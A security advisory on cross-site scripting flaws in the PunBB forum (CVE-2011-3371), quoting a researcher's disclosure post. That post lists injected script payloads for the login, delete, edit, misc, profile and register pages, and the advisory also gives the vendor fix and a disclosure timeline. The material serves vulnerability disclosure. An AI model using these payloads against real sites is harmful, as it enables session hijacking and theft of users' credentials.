PunBB Input Validation Holes Permit Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1026073 |
|
SecurityTracker URL: http://securitytracker.com/id/1026073
|
|
CVE Reference:
CVE-2011-3371
(Links to External Site)
|
Updated: Sep 23 2011
|
Original Entry Date: Sep 20 2011
|
Impact:
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): prior to 1.3.6
|
Description:
A vulnerability was reported in PunBB. A remote user can conduct cross-site scripting attacks.
Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PunBB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
The 'login.php', 'delete.php', 'edit.php', 'misc.php', 'profile.php', and 'register.php' are affected.
Piotr Duszynski (@drk1wi) reported this vulnerability.
|
Impact:
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PunBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
|
Solution:
The vendor has issued a fix (1.3.6).
The vendor's advisory is available at:
http://punbb.informer.com/forums/topic/24430/punbb-136/
|
Vendor URL: punbb.informer.com/forums/topic/24430/punbb-136/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 16 Sep 2011 18:43:47 +0200
Subject: [Full-disclosure] PunBB PHP Forum - Multiple XSS
|
=======================================================================
PunBB PHP Forum - Multiple XSS
=======================================================================
Affected Software : PunBB PHP Forum
Severity : Medium
Local/Remote : Remote
Author : @drk1wi
[Summary]
Just for those whom it might concern.
These vulnerabilities have been identified for the latest (clean
version 1.3.5) during one of my penetration tests.
[Vulnerability Details]
GET
/login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>
GET
/misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>
POST /delete.php?id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</script>
POST /edit.php?id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>
POST /login.php?action=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oink)</script>
POST /misc.php?email=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>
POST
/profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><script>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script>
POST /register.php?action=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>®ister=>"'><script>alert(oink)</script>
[Time-line]
20/08/2011 - Vendor notified
02/09/2011 - No e-mail reply and BAN on Forum
??? - Vendor patch release
16/09/2011 - Public disclosure
[Fix Information]
Cheers,
Piotr Duszynski (@drk1wi)
http://sharpsec.net
X. LEGAL NOTICES
Copyright (c) 2011 Piotr "drk1wi" Duszynski
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
